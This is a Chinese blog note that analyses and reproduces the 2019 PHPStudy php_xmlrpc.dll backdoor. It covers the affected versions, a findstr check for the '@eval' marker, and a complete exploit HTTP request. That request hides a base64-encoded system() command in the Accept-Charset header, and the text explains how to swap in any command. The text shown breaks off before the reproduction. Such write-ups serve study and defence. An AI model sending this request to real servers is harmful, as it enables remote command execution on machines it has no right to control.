PHPStudy后门分析+复现 & 附批量Py脚本

2019 年 10 月 7 日
笔记

phpstudy简介

Phpstudy是一款PHP调试环境的程序集成包，集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款软件一次性安装，无需配置，即装即用。由于其免费且方便的特性，在国内有着近百万的PHP语言学习者、开发者用户。

后门名称：Phpstudy后门

威胁等级：严重

影响范围：Phpstudy 2016、phpstudy2018

后门类型：C&C、命令执行

利用难度：极易

影响范围

目前已知受影响的phpstudy版本：

· Phpstudy 2016版php-5.4

· Phpstudy 2018版php-5.2.17

· Phpstudy 2018版php-5.4.45

隐藏后门分析

通过分析，后门代码存在于extphp_xmlrpc.dll模块中，至少有2个版本：

用户可以通过搜索php_xmlrpc.dll模块中包含“@eval”关键字快速判断是否是存在后门的版本，命令参考：

findstr /m /s /c:"@eval" *.* Jaky，公众号：洛米唯熊phpStudy隐藏后门预警

以上后门分析转自洛米唯熊

隐藏后门复现

就在昨晚，大佬就在朋友圈分享了phpstudy后门的exp

而我自己的phpstudy是很久以前就安装在电脑的2018版本

那么我们就来看看，这个exp能否复现成功呢？

EXP如下:

GET /1.php HTTP/1.1  Host: secquan.org  Cache-Control: max-age=0  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  Accept-Language: zh-CN,zh;q=0.9  Accept-Encoding:gzip,deflate  Accept-Charset:这里就是要执行的命令base64加密c3lzdGVtKCdjYWxjLmV4ZScpOw==  Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282  Connection: close

Accept-Charset 地方就是我们exp的核心，如果想要执行其他命令，直接去把命令进行base64编码即可！

那我们来打开我们的18版的phpstudy